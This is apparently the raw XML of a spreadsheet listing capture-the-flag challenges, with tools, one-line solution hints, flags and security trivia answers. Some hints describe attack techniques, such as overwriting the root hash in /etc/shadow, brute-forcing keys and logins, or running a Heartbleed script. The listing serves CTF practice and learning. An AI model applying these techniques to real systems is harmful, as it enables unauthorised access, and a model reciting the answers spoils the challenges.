    <t>The easieast way is concatenate 3 peases into 1 and try. It will be enough, the flag is WH@t!Flag=(AB241ACCTGMNSQGT)</t>
  </si>
  <si>
    <t>ollydbg, immunity debuggers</t>
  </si>
  <si>
    <t>gone</t>
  </si>
  <si>
    <t>ext4</t>
  </si>
  <si>
    <t>extundelete find directory system, mount and openssl to get file that has flag</t>
  </si>
  <si>
    <t>lost flug</t>
  </si>
  <si>
    <t>re 300</t>
  </si>
  <si>
    <t>programming 100</t>
  </si>
  <si>
    <t>look at log and find the freenode he joined and the channel, join to get flag</t>
  </si>
  <si>
    <t>pick the correct color</t>
  </si>
  <si>
    <t>Write a script to click the different color square (programming)</t>
  </si>
  <si>
    <t>It's possible to backtrace through the binary and grab the required numarical values that must be input to get the flag</t>
  </si>
  <si>
    <t>tf2</t>
  </si>
  <si>
    <t>ollydbg, immunity debuggers, ida &amp; ida-stealth</t>
  </si>
  <si>
    <t>search for eriner on steam, look for tf2 game info, custom gun name is flag</t>
  </si>
  <si>
    <t xml:space="preserve">whitehat grand prix quals </t>
  </si>
  <si>
    <t>Dong Van</t>
  </si>
  <si>
    <t>capture the bool</t>
  </si>
  <si>
    <t>exe</t>
  </si>
  <si>
    <t>open file in hexeditor</t>
  </si>
  <si>
    <t>Binary matches your input with a base64 string, you can also find the charset used to encode strings in the binary. Write a script to encode the proper string</t>
  </si>
  <si>
    <t>ZmxhZ3tiYXNlNjRfaXNfaGFyZF9odWh9Cg==</t>
  </si>
  <si>
    <t>programming 200</t>
  </si>
  <si>
    <t>do some calculations</t>
  </si>
  <si>
    <t>calculate what is sent to you, numbers, letters, roman figures... ect (programming)</t>
  </si>
  <si>
    <t>programming 300</t>
  </si>
  <si>
    <t>solve the maze</t>
  </si>
  <si>
    <t>linux command: strings</t>
  </si>
  <si>
    <t>Parse the maze and solve it before you run out of energy (programming)</t>
  </si>
  <si>
    <t>Ha Long</t>
  </si>
  <si>
    <t>programming 500</t>
  </si>
  <si>
    <t>PE32 exe</t>
  </si>
  <si>
    <t>Reverse the password check algorithm and use Microsoft Z3 Solver to bruteforce the proper password</t>
  </si>
  <si>
    <t>blackjack statsicis</t>
  </si>
  <si>
    <t>Ollydbg, Immunity debuggers. Anti-debugging plugins</t>
  </si>
  <si>
    <t xml:space="preserve">Write a script to calculate the probability of winning a blackjack game given specific odds. </t>
  </si>
  <si>
    <t>grids</t>
  </si>
  <si>
    <t>title</t>
  </si>
  <si>
    <t>calculate a convex hull</t>
  </si>
  <si>
    <t>base64 decode</t>
  </si>
  <si>
    <t>given a set of points you must write a script to calculate the largest 2d polygon that takes up maximum surface aera (programming)</t>
  </si>
  <si>
    <t>classic</t>
  </si>
  <si>
    <t>quote from hackers</t>
  </si>
  <si>
    <t>flag is missing part</t>
  </si>
  <si>
    <t>irc</t>
  </si>
  <si>
    <t>freenode version</t>
  </si>
  <si>
    <t>connect and run /ctcp Eriner version</t>
  </si>
  <si>
    <t>Hue</t>
  </si>
  <si>
    <t>x64 exe</t>
  </si>
  <si>
    <t>opcode</t>
  </si>
  <si>
    <t>key is an Unicode string of 42 characters. It is encrypted using xor, add (subtract) and not operations. The encrypted buffer is then compared every 4 bytes with a pre-calculated buffer. This class also has a decrypt method to inverse the encrypt operation.</t>
  </si>
  <si>
    <t>compute opcode of hint</t>
  </si>
  <si>
    <t>incognito</t>
  </si>
  <si>
    <t>leaks-suspected</t>
  </si>
  <si>
    <t>Sa Pa</t>
  </si>
  <si>
    <t>uploaded files</t>
  </si>
  <si>
    <t>use foremost to get files from pcap</t>
  </si>
  <si>
    <t>The EXE contains serveral .pyc files which can be decompiled to find a HTTP request to an IP address. Replay this request to retireve the flag</t>
  </si>
  <si>
    <t>here-be-dragons</t>
  </si>
  <si>
    <t>No Writeup - However my guess is you connected to a server which required you to solve some optimal path problems.  (programming)</t>
  </si>
  <si>
    <t>She said it doesn't matter</t>
  </si>
  <si>
    <t>smashing the stack for fun and profit</t>
  </si>
  <si>
    <t>given an adress</t>
  </si>
  <si>
    <t>Find the hidden flag</t>
  </si>
  <si>
    <t>script to SSP leak</t>
  </si>
  <si>
    <t xml:space="preserve">Fix the header information to contain the right image size and crc32 hash. </t>
  </si>
  <si>
    <t>Windows Tool: PNG Analyzer</t>
  </si>
  <si>
    <t>racer</t>
  </si>
  <si>
    <t>try harder</t>
  </si>
  <si>
    <t>rc4 encryted 40 pills</t>
  </si>
  <si>
    <t>DOS/MBR sector</t>
  </si>
  <si>
    <t>write script to get all 40 fast enough</t>
  </si>
  <si>
    <t>Updator</t>
  </si>
  <si>
    <t xml:space="preserve">Use binwalk on the MBR to retrieve an mp3 file, looking at the metadata there's a base64 string which gives you a URL when decoded. Take the spaces as 0's and tab's as 1's giving you a second link that contains two files that must be XOR'ed together to retrieve the key. </t>
  </si>
  <si>
    <t>Binwalk, Exiftool</t>
  </si>
  <si>
    <t>reverse the cipher</t>
  </si>
  <si>
    <t>pythonista</t>
  </si>
  <si>
    <t>grab the backend python modules using uncompyle. Then reverse the cipher with the other backend modules captured</t>
  </si>
  <si>
    <t>text file is base64 strings</t>
  </si>
  <si>
    <t>Emotional Rollercoaster</t>
  </si>
  <si>
    <t>python script to decode and find flag</t>
  </si>
  <si>
    <t>Programming 1</t>
  </si>
  <si>
    <t>Recieve the flag</t>
  </si>
  <si>
    <t>decode image</t>
  </si>
  <si>
    <t>convert instructions to pixels with Brainloller</t>
  </si>
  <si>
    <t>Many Steps, the basic idea is your machine will be 'attacked' when you connect to the provided VPN. You must configure your machine to process all of the requested traffic. Doing so will give you several files that lead to a flag</t>
  </si>
  <si>
    <t>Dnsmasq, Wireshark, MockSMTP</t>
  </si>
  <si>
    <t>Programming 2</t>
  </si>
  <si>
    <t xml:space="preserve">ssl sniff </t>
  </si>
  <si>
    <t>use expansion formula with quantum gates substituted</t>
  </si>
  <si>
    <t>any</t>
  </si>
  <si>
    <t>Follow the TCP stream, you'll find the flag</t>
  </si>
  <si>
    <t>math is hard</t>
  </si>
  <si>
    <t>each sum had to be found 8 times</t>
  </si>
  <si>
    <t>ssl sniff 2</t>
  </si>
  <si>
    <t>enter in the previously captured SSL key under Analyze -&gt; Follow -&gt; SSL -&gt; SSL Stream to retrieve the flag</t>
  </si>
  <si>
    <t>simple stegano</t>
  </si>
  <si>
    <t xml:space="preserve">must retrieve the base values for the original image and then subtract those from the given pixel values in provided picture </t>
  </si>
  <si>
    <t>Can You Read Pacifico</t>
  </si>
  <si>
    <t>Solve these captchas</t>
  </si>
  <si>
    <t xml:space="preserve">Write a captcha solving script! </t>
  </si>
  <si>
    <t>dr. bob</t>
  </si>
  <si>
    <t>Virtual Machine</t>
  </si>
  <si>
    <t>Retrieve bobs keys</t>
  </si>
  <si>
    <t>Only /home/ gets encrypted. Because of this you have control of etc/shadow. Replace the root account's password hash with your own known hash and log in</t>
  </si>
  <si>
    <t>Python</t>
  </si>
  <si>
    <t>mathwiz</t>
  </si>
  <si>
    <t>Solve the expressions</t>
  </si>
  <si>
    <t>write a simple script to eval the simple math expressions sent</t>
  </si>
  <si>
    <t>catwestern</t>
  </si>
  <si>
    <t xml:space="preserve">Write a script to interpret and emulate an x64 machine with the passed initial state. </t>
  </si>
  <si>
    <t>blackbox</t>
  </si>
  <si>
    <t>open the blackbox</t>
  </si>
  <si>
    <t>write a code wrapper to solve the black box problems</t>
  </si>
  <si>
    <t>Splitted</t>
  </si>
  <si>
    <t>Pcap</t>
  </si>
  <si>
    <t>Find the hidden data</t>
  </si>
  <si>
    <t>Open the pcap in wireshark, you'll see a flag.zip archive has been donwloaded. Pull the archive data from the stream 'File-&gt;EO-&gt;HTTP-&gt;Save' then rebuild the archive with 'tshark -r splitted.pcap -V -Y 'http.request' | grep Range | tr '=\-' ' ' | awk '{print $3}' | sort -n | while read line; do awk "/$line/{print NR-1; exit}" downloads; done | while read number; do cat "flag($number).zip" &gt;&gt; flag.zip; done'</t>
  </si>
  <si>
    <t>stream</t>
  </si>
  <si>
    <t>retrieve the video traffic</t>
  </si>
  <si>
    <t>Hack Lu CTF</t>
  </si>
  <si>
    <t>Provided with a pcap that contains NetShow Media Player traffic. Extract the video stream from the pcap and set up vlc to playback the network stream to retrieve the flag</t>
  </si>
  <si>
    <t>GuessTheNumber</t>
  </si>
  <si>
    <t>write a script to guess the magic number, an understanding of the algorithm used to generate the value is required</t>
  </si>
  <si>
    <t>QR Code Recovery Challenge</t>
  </si>
  <si>
    <t>Broken QR code</t>
  </si>
  <si>
    <t>Fix the QR code</t>
  </si>
  <si>
    <t>Study the QR code format specifications and then restore the QR code</t>
  </si>
  <si>
    <t>perl golf</t>
  </si>
  <si>
    <t>convert some strings</t>
  </si>
  <si>
    <t>Use regex in perl to create the required camel case strings then send them back to the server</t>
  </si>
  <si>
    <t>nogaya castle</t>
  </si>
  <si>
    <t>theres a flag hidden in the image</t>
  </si>
  <si>
    <t>Open the image in stegosolve in the RGB plane 0 values to find the flag</t>
  </si>
  <si>
    <t>Stegosolve</t>
  </si>
  <si>
    <t>miyako</t>
  </si>
  <si>
    <t>Print a list of the pixels in the given image using pixels.py. Then Every second pixel, we calculate the difference of the blue value to the previous pixel and interpret it as either a 0 (if negative) or 1 (if positive). Finally convert the binary string to ascii to get the flag</t>
  </si>
  <si>
    <t>php golf</t>
  </si>
  <si>
    <t>Same as perl golf, just written in php</t>
  </si>
  <si>
    <t>NO WRITE UP.</t>
  </si>
  <si>
    <t>i-150</t>
  </si>
  <si>
    <t>Read the code in exactly as it is formatted</t>
  </si>
  <si>
    <t>First, you define a way to encode arbitrary code bytes as a constant (e.g. a string, array or number), then you write two functions to operate on that constant. One outputs the constant verbatim, and the other outputs the decoded version of the constant. Then you just encode the decoder functions into the desired constant, append the decoders, and you're done.</t>
  </si>
  <si>
    <t>Bpythonastic</t>
  </si>
  <si>
    <t>.raw</t>
  </si>
  <si>
    <t>Apply strings against the dump and seach for 'flag, python,challenenge' Which will help you find a base 64 encoded string. Decode the string to get a sha256 hash that can be found in an online databse</t>
  </si>
  <si>
    <t>PDFCeption</t>
  </si>
  <si>
    <t>.vdi</t>
  </si>
  <si>
    <t>carve the data from the image</t>
  </si>
  <si>
    <t>use foremost to carve the pdf out of the vdi, then run an LSB diff against the pdf logo to find the flag</t>
  </si>
  <si>
    <t>Foremost Data Carving</t>
  </si>
  <si>
    <t>Private</t>
  </si>
  <si>
    <t>find the flag in the traffic</t>
  </si>
  <si>
    <t xml:space="preserve">Flag is hidden throughout many ICMP requests. Apply a filter 'icmp and ip.src==192.168.50.10' and follow the stream </t>
  </si>
  <si>
    <t>custom language - 'i'</t>
  </si>
  <si>
    <t>Bleep</t>
  </si>
  <si>
    <t>HEX</t>
  </si>
  <si>
    <t>retrieve the flag from the provided data</t>
  </si>
  <si>
    <t>Convert the given HEX into binary and inpect the firmware dump with ECB tool. The patterns are Morse code. Translate the patterns for the flag.</t>
  </si>
  <si>
    <t>glass</t>
  </si>
  <si>
    <t>iss</t>
  </si>
  <si>
    <t>Cooper</t>
  </si>
  <si>
    <t>pattern lock</t>
  </si>
  <si>
    <t>find the flag in the data</t>
  </si>
  <si>
    <t>jetpack</t>
  </si>
  <si>
    <t>Calculate the number of possible lockscreens</t>
  </si>
  <si>
    <t>Given a PE32 exe with data hidden inside. Extract the files using foremost and look at the pdf. Crack the password with pdfcrack and the supplied wordlist. Flag is: StephenHawkingSpentSomeTimeOnSteganoTrolling</t>
  </si>
  <si>
    <t>binwalk, foremost, pdfcrack with rockyou.txt dictonary</t>
  </si>
  <si>
    <t>voicebox</t>
  </si>
  <si>
    <t>VWS</t>
  </si>
  <si>
    <t xml:space="preserve">Write a script to calculate the number of possible lockscreens you can generate given the number of nodes. </t>
  </si>
  <si>
    <t>def-con-ctf-finals</t>
  </si>
  <si>
    <t>(forensics)</t>
  </si>
  <si>
    <t>eliza_arm</t>
  </si>
  <si>
    <t>NO QUESTION OR WRITE-UP</t>
  </si>
  <si>
    <t>facebox</t>
  </si>
  <si>
    <t>eliza_x86</t>
  </si>
  <si>
    <t>gain access to the git files</t>
  </si>
  <si>
    <t>clone the git directory to gain access to the soruce to gain access to the hash algorithm md5(privkey + filename). Bruteforce the privkey '95594864' then generate the hash of the privatefile md5("95594864confidentials.txt") which will give you access to the flag</t>
  </si>
  <si>
    <t>imap_v1</t>
  </si>
  <si>
    <t>imap_v2</t>
  </si>
  <si>
    <t>ovaltine</t>
  </si>
  <si>
    <t>justify</t>
  </si>
  <si>
    <t>wdub_v1</t>
  </si>
  <si>
    <t>wdub_v2</t>
  </si>
  <si>
    <t>Most of the pcap contains encrypted traffic, however there are some TCP streams availaible. Export the HTTP objects to get serveral emails. One of them contains a base 64 encoded message which is the flag</t>
  </si>
  <si>
    <t>Wireshark, base64 decoder</t>
  </si>
  <si>
    <t>sniffthis</t>
  </si>
  <si>
    <t>retrieve the downloaded file</t>
  </si>
  <si>
    <t>Search the stream for "key.bmp" which will lead to a link you can download. Open the file in word and delete the bambi image to reveal the flag</t>
  </si>
  <si>
    <t>Wireshark, microsoft word</t>
  </si>
  <si>
    <t>hype</t>
  </si>
  <si>
    <t>hyperboria - cjdns</t>
  </si>
  <si>
    <t>What kind of traffic is this?</t>
  </si>
  <si>
    <t>Providied a strange looking link and a textfile. You must find out that the link providied is a cjdns / hyperboria link. The textfile contains hyperboria nodes. install and setup njdns using the provided nodes then connect to the link</t>
  </si>
  <si>
    <t>perfect matching</t>
  </si>
  <si>
    <t>Find the matching pairs</t>
  </si>
  <si>
    <t>square</t>
  </si>
  <si>
    <t>Write a script to calculate / find the matching pairs</t>
  </si>
  <si>
    <t>no write up</t>
  </si>
  <si>
    <t>stop</t>
  </si>
  <si>
    <t>31c3 'CCC'</t>
  </si>
  <si>
    <t>Ca Mau</t>
  </si>
  <si>
    <t>I think there's a flag during the video?</t>
  </si>
  <si>
    <t>Video contains frames unrelated to the actual video. If you extract the frames and put them together in GIMP you'll get ASCII art depicting the flag</t>
  </si>
  <si>
    <t>GIMP</t>
  </si>
  <si>
    <t xml:space="preserve">Leet Maze </t>
  </si>
  <si>
    <t>Phong Nha Ke Bang</t>
  </si>
  <si>
    <t>dig / python-dns</t>
  </si>
  <si>
    <t>recieve the flag</t>
  </si>
  <si>
    <t>Extract the file from the traffic</t>
  </si>
  <si>
    <t>send a dns query to the provided domain to get another. Script the process to get the flag (ssl key)</t>
  </si>
  <si>
    <t>Python - DNS module</t>
  </si>
  <si>
    <t>Extract the contents of the TCP stream as RAW. The file extracted is PCM audio that can be opened in Audacity if the encoding is set as 16-bit PCM with a sample rate of 44100Hz. Listen to the audio to get the flag</t>
  </si>
  <si>
    <t>Wireshark, Audacity</t>
  </si>
  <si>
    <t>fragment2</t>
  </si>
  <si>
    <t>decode</t>
  </si>
  <si>
    <t>python script to decode message in tcp packet</t>
  </si>
  <si>
    <t>exec dmesg</t>
  </si>
  <si>
    <t>cipherflag</t>
  </si>
  <si>
    <t>run in qemu, launch gdb, search for string 'SECCON'</t>
  </si>
  <si>
    <t>qemu</t>
  </si>
  <si>
    <t>NO WRITEUP</t>
  </si>
  <si>
    <t>Strange Authen</t>
  </si>
  <si>
    <t>find the correct login</t>
  </si>
  <si>
    <t>Robots.txt contains a path to a .pcap which contains important data, use one of the logins from the pcap and bruteforce the password. Login to retrieve flag</t>
  </si>
  <si>
    <t>bindshell</t>
  </si>
  <si>
    <t>roll</t>
  </si>
  <si>
    <t>booking</t>
  </si>
  <si>
    <t>cairo</t>
  </si>
  <si>
    <t>cfy2</t>
  </si>
  <si>
    <t>fyltr</t>
  </si>
  <si>
    <t>nokia-31337</t>
  </si>
  <si>
    <t>gain access to a nokia cellphone via baseband</t>
  </si>
  <si>
    <t>pin</t>
  </si>
  <si>
    <t>Gain code execution outside of sandbox</t>
  </si>
  <si>
    <t>functional_highfive</t>
  </si>
  <si>
    <t>Scheme</t>
  </si>
  <si>
    <t>open key file</t>
  </si>
  <si>
    <t>exploit Scheme language</t>
  </si>
  <si>
    <t>greenmonster</t>
  </si>
  <si>
    <t>connect to server</t>
  </si>
  <si>
    <t>sketchy</t>
  </si>
  <si>
    <t>unsolved</t>
  </si>
  <si>
    <t>geohot pls</t>
  </si>
  <si>
    <t>ctf streaming</t>
  </si>
  <si>
    <t>livectf</t>
  </si>
  <si>
    <t>Misc 100</t>
  </si>
  <si>
    <t>use hint</t>
  </si>
  <si>
    <t>hint gives sub redit page, with flag on it</t>
  </si>
  <si>
    <t>Misc 200</t>
  </si>
  <si>
    <t>Barnette's conjecture is an 'unsolved problem'</t>
  </si>
  <si>
    <t>Network 100</t>
  </si>
  <si>
    <t>SSH</t>
  </si>
  <si>
    <t>find secret, google hash</t>
  </si>
  <si>
    <t>Quest 100</t>
  </si>
  <si>
    <t>md5 'password'</t>
  </si>
  <si>
    <t>echo -n password | md5sum</t>
  </si>
  <si>
    <t>Quest 400</t>
  </si>
  <si>
    <t>1983 movie Wargames, launch code used 'cpe1704tks'</t>
  </si>
  <si>
    <t>Barmixer-bot</t>
  </si>
  <si>
    <t>hacked bot</t>
  </si>
  <si>
    <t>exploit !base64d functionality</t>
  </si>
  <si>
    <t>Admin-200</t>
  </si>
  <si>
    <t>mount vm disk and connect to server</t>
  </si>
  <si>
    <t>Joy-200</t>
  </si>
  <si>
    <t>japcross.txt</t>
  </si>
  <si>
    <t>https://sourceforge.net/projects/jsolver/files/</t>
  </si>
  <si>
    <t>CAN HAS STDIO?</t>
  </si>
  <si>
    <t>brainfuck program</t>
  </si>
  <si>
    <t>extract and run to get flag</t>
  </si>
  <si>
    <t>Janos the Ripper</t>
  </si>
  <si>
    <t>password protected zipped file</t>
  </si>
  <si>
    <t>fcrackzip to get password</t>
  </si>
  <si>
    <t>tool: frackzip</t>
  </si>
  <si>
    <t>Test flag, please ignore</t>
  </si>
  <si>
    <t>extract zipped file</t>
  </si>
  <si>
    <t>Hex-decode text</t>
  </si>
  <si>
    <t>doom6</t>
  </si>
  <si>
    <t>NO WRITEUP(misc)</t>
  </si>
  <si>
    <t>securestore</t>
  </si>
  <si>
    <t>NO WRITEUP(exploitation)</t>
  </si>
  <si>
    <t>main()</t>
  </si>
  <si>
    <t>Matter of combination</t>
  </si>
  <si>
    <t>NoDebug</t>
  </si>
  <si>
    <t>WRITEUPS NOT IN ENGLISH</t>
  </si>
  <si>
    <t>Numbers and Shit</t>
  </si>
  <si>
    <t>Remote Kg</t>
  </si>
  <si>
    <t>Unknown</t>
  </si>
  <si>
    <t>Tears in Wooyaggo</t>
  </si>
  <si>
    <t>wooyatalk</t>
  </si>
  <si>
    <t>NO WRITEUP(reversing)</t>
  </si>
  <si>
    <t>yaggoya</t>
  </si>
  <si>
    <t>yet another javascript jail</t>
  </si>
  <si>
    <t>NO WRITEUP(pwn)</t>
  </si>
  <si>
    <t>Heartbleed</t>
  </si>
  <si>
    <t>use heartbleed python script</t>
  </si>
  <si>
    <t>multiplication is hard</t>
  </si>
  <si>
    <t>old excel bug</t>
  </si>
  <si>
    <t>Sanity checl</t>
  </si>
  <si>
    <t>key is poop</t>
  </si>
  <si>
    <t>Trivia 1</t>
  </si>
  <si>
    <t>None</t>
  </si>
  <si>
    <t>Question is hint that you need to look into Postel's Law. (Misc / Trivia)</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Robustness_principle</t>
  </si>
  <si>
    <t>Trivia 2</t>
  </si>
  <si>
    <t>Question is hint that you need to look into the slashdot effect.</t>
  </si>
  <si>
    <t>Undistorted History</t>
  </si>
  <si>
    <t>Where is this place? The place is the persan gulf. (Trivia)</t>
  </si>
  <si>
    <t>Winner</t>
  </si>
  <si>
    <t>Google "Cheetah...lane....tangle...winner". (misc / trivia)</t>
  </si>
  <si>
    <t>miscellaneous 100</t>
  </si>
  <si>
    <t>MD5 hash of 8dot3name (apparently an argument to fsutil) (misc)</t>
  </si>
  <si>
    <t>welcome to seccon</t>
  </si>
  <si>
    <t>flag is the date</t>
  </si>
  <si>
    <t>misc100</t>
  </si>
  <si>
    <t>easy to some hard to most</t>
  </si>
  <si>
    <t>put the shredded document back in order</t>
  </si>
  <si>
    <t>misc200</t>
  </si>
  <si>
    <t>listen to their radio</t>
  </si>
  <si>
    <t>recon300</t>
  </si>
  <si>
    <t>public phone number</t>
  </si>
  <si>
    <t>read mesasge using service</t>
  </si>
  <si>
    <t>http://sellaite.com/smsreceiver/index.php?phone=%200037255933368</t>
  </si>
  <si>
    <t>Trivial</t>
  </si>
  <si>
    <t>Figure out the missing character from the string "Hack the Planet!" (misc)</t>
  </si>
  <si>
    <t>givefeedback</t>
  </si>
  <si>
    <t>answer feedback questions about ctf</t>
  </si>
  <si>
    <t>flag-finder</t>
  </si>
  <si>
    <t>run binary</t>
  </si>
  <si>
    <t>facebook</t>
  </si>
  <si>
    <t>flag was hidden on a facebook page about icectf</t>
  </si>
  <si>
    <t>not found</t>
  </si>
  <si>
    <t xml:space="preserve">none </t>
  </si>
  <si>
    <t>flag was hidden on 'https://icec.tf/CDIV(194)'</t>
  </si>
  <si>
    <t>warm up</t>
  </si>
  <si>
    <t xml:space="preserve">Hack the planet! </t>
  </si>
  <si>
    <t>Go watch hackers http://www.imdb.com/title/tt0113243/?ref_=nv_sr_1</t>
  </si>
  <si>
    <t xml:space="preserve">not weird selfie </t>
  </si>
  <si>
    <t>Tweet a picture of you and your team with a bear and the hashtag #schoolctf</t>
  </si>
  <si>
    <t>feel like siberian</t>
  </si>
  <si>
    <t>Take a selfe and send it to the team (misc)</t>
  </si>
  <si>
    <t>Newton style</t>
  </si>
  <si>
    <t>custom game</t>
  </si>
  <si>
    <t>Earn 1000 points in the game or use 'strings' on level0 (misc)</t>
  </si>
  <si>
    <t>misc 100</t>
  </si>
  <si>
    <t>Solve the provided crossword puzzle for the flag (misc)</t>
  </si>
  <si>
    <t>bonus point</t>
  </si>
  <si>
    <t>Bonus points for the team that submits the most interesting tools, codes, bugs...ect (misc)</t>
  </si>
  <si>
    <t>launch printer</t>
  </si>
  <si>
    <t>How do you call a printer from the command line? (misc)</t>
  </si>
  <si>
    <t>Survey</t>
  </si>
  <si>
    <t>Take the Survey (misc)</t>
  </si>
  <si>
    <t>What's example flag?</t>
  </si>
  <si>
    <t>find the example flag (misc)</t>
  </si>
  <si>
    <t>flufferduff</t>
  </si>
  <si>
    <t>flufferduff pastebin</t>
  </si>
  <si>
    <t>Example Flag</t>
  </si>
  <si>
    <t>You're given the flag (misc)</t>
  </si>
  <si>
    <t>trivia-1</t>
  </si>
  <si>
    <t>Solution is PlugX malware</t>
  </si>
  <si>
    <t>trivia-2</t>
  </si>
  <si>
    <t>no-more-free-bugs!</t>
  </si>
  <si>
    <t>system-management mode</t>
  </si>
  <si>
    <t>trivia-3</t>
  </si>
  <si>
    <t>Timing attacks and race conditions!</t>
  </si>
  <si>
    <t>trivia-4</t>
  </si>
  <si>
    <t>DLL Injections!</t>
  </si>
  <si>
    <t>trivia-5</t>
  </si>
  <si>
    <t xml:space="preserve">Rob Fuller - Mubix! </t>
  </si>
  <si>
    <t>trivial</t>
  </si>
  <si>
    <t>Go to a local store and buy 4 items that total sum is $13.37</t>
  </si>
  <si>
    <t>Late Night Smash</t>
  </si>
  <si>
    <t>Beat one of the organizers at smash bros</t>
  </si>
  <si>
    <t>moar chess</t>
  </si>
  <si>
    <t>Play 3v1 chess game against one of the organizers</t>
  </si>
  <si>
    <t>Automated analysis mistakes</t>
  </si>
  <si>
    <t>What is the name of the worm that was used to accack a famous Belgain cryptographer</t>
  </si>
  <si>
    <t>OWASP</t>
  </si>
  <si>
    <t>To protect against for example XSS, OWASP offers a great library which helps you implement input validation. Find the library and report what default regex is used to validate filenames that are given as input.</t>
  </si>
  <si>
    <t>Validator.FileName=^[a-zA-Z0-9!@#$%^&amp;{}\\[\\]()_+\\-=,.~'` ]{1,255}$</t>
  </si>
  <si>
    <t>Static Analysis</t>
  </si>
  <si>
    <t>How do we call the analysis that static analysis solutions use to track user input throughout the application?</t>
  </si>
  <si>
    <t>That’s called taint analysis.</t>
  </si>
  <si>
    <t>Advanced Persistent Threats</t>
  </si>
  <si>
    <t>Cryptographic Algorithms</t>
  </si>
  <si>
    <t>What is the name of the cipher on which the AES specification is based?</t>
  </si>
  <si>
    <t>Hacker Movies</t>
  </si>
  <si>
    <t>What is the name of a hacker movie from 1983 in which a young man finds a backdoor into a military central computer in which reality is confused with game-playing, possibly starting Wrold War III</t>
  </si>
  <si>
    <t>Hiding Information</t>
  </si>
  <si>
    <t>What is the name of the art or practice of concealing a messge, image, or file within andother a message, image, or file?</t>
  </si>
  <si>
    <t>Malware Categories</t>
  </si>
  <si>
    <t>What is the well known name for the type of malware the restricts access to the computer system that it infects and demands a fee to remove this restriction?</t>
  </si>
  <si>
    <t>No Such Agency</t>
  </si>
  <si>
    <t>What’s the NSA’s synonym for a type of malware that hides the presence of certain programs or processes from the kernel?</t>
  </si>
  <si>
    <t>Implant</t>
  </si>
  <si>
    <t>Security Conferences</t>
  </si>
  <si>
    <t>What is the name of one of the biggest hacking conferences in the world? The 22th edition of this conference was in August 2014 in Las Vegas.</t>
  </si>
  <si>
    <t>https://www.defcon.org/</t>
  </si>
  <si>
    <t>Security History v2</t>
  </si>
  <si>
    <t>Last name of a German civil engineer, inventor and computer pioneer. His greatest achievement was the world’s first programmable computer in May 1941.</t>
  </si>
  <si>
    <t>Secuirty History</t>
  </si>
  <si>
    <t>What is the last name of the British mathematician, logician, cryptanalyst, philosopher and computer scientist who concentrated on cryptanalysis of the Enigma during WWII?</t>
  </si>
  <si>
    <t>Security Organizations</t>
  </si>
  <si>
    <t>A worldwide not-for-profit charitable organization focused on improving the security of software. Their mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks. What is the acronym of this organisation?</t>
  </si>
  <si>
    <t>Security Software</t>
  </si>
  <si>
    <t>What is the name of the project designed to protect your privacy &amp; defend against surveillance?</t>
  </si>
  <si>
    <t>Security Terminology v2</t>
  </si>
  <si>
    <t>A trap set to detect, deflect, or, in some manner, counteract attempts at unauthorized use of information systems. Generally consists of a computer, data, or a network site that appears to be part of a network, but is actually isolated and monitored, and which seems to contain information or a resource of value to attackers. What is the name of this type of trap?</t>
  </si>
  <si>
    <t>What is the acronym for the attack where an attempt to make a machine or network resource unavailable to its intended users is performed in a distributed way?</t>
  </si>
  <si>
    <t>Software Vinlerabilities v1</t>
  </si>
  <si>
    <t>What is the name of the serious vulnerability in the popular OpenSSL cryptographic software library that cause a lot of uproar in the security industry?</t>
  </si>
  <si>
    <t>complete survey for flag</t>
  </si>
  <si>
    <t>that sounds delicous</t>
  </si>
  <si>
    <t>pastebin.com</t>
  </si>
  <si>
    <t>champion</t>
  </si>
  <si>
    <t>online game</t>
  </si>
  <si>
    <t>beat the game for the flag</t>
  </si>
  <si>
    <t>welcome</t>
  </si>
  <si>
    <t>the flag is given to you</t>
  </si>
  <si>
    <t>Bobby</t>
  </si>
  <si>
    <t xml:space="preserve">What is bobby tables real name? </t>
  </si>
  <si>
    <t>eff</t>
  </si>
  <si>
    <t>While lots of fundraisers for the EFF are heal every year at DEFCON, this one is the most stylish.</t>
  </si>
  <si>
    <t>I belive the answer is MohawkCON</t>
  </si>
  <si>
    <t>MUNG</t>
  </si>
  <si>
    <t>What MIT student group defined the terem MUNG as the recursive algorithm MUNG Until No Good.</t>
  </si>
  <si>
    <t>type 1</t>
  </si>
  <si>
    <t xml:space="preserve">Defcon CTF is a famous example of this style of ctf competition. </t>
  </si>
  <si>
    <t>Attack-defence</t>
  </si>
  <si>
    <t>type 2</t>
  </si>
  <si>
    <t>This style of competition is more commonly found in an online-only format, as it is much eaier to run than the other mjaor style of CTF.</t>
  </si>
  <si>
    <t>Jeopardy style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</si>
</sst>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quot;-&quot;mm&quot;-&quot;dd"/>
  </numFmts>
  <fonts count="70">
    <font>
      <sz val="10.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <color rgb="FF000000"/>
      <name val="Sans"/>
    </font>
    <font/>
    <font>
      <color rgb="FF000000"/>
    </font>
    <font>
      <color rgb="FF000000"/>
      <name val="Sans"/>
    </font>
    <font>
      <b/>
    </font>
    <font>
      <b/>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <sz val="12.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="12.0"/>
      <color rgb="FF333333"/>
      <name val="Arial"/>
    </font>
    <font>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="10.0"/>
      <name val="Arial"/>
    </font>
    <font>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="12.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="10.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <color rgb="FF000000"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
    </font>
    <font>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="10.0"/>
      <color rgb="FF333333"/>
      <name val="Arial"/>
    </font>
    <font>
      <color rgb="FF333333"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF000000"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color rgb="FF005580"/>
      <name val="&quot;Helvetica Neue&quot;"/>
    </font>
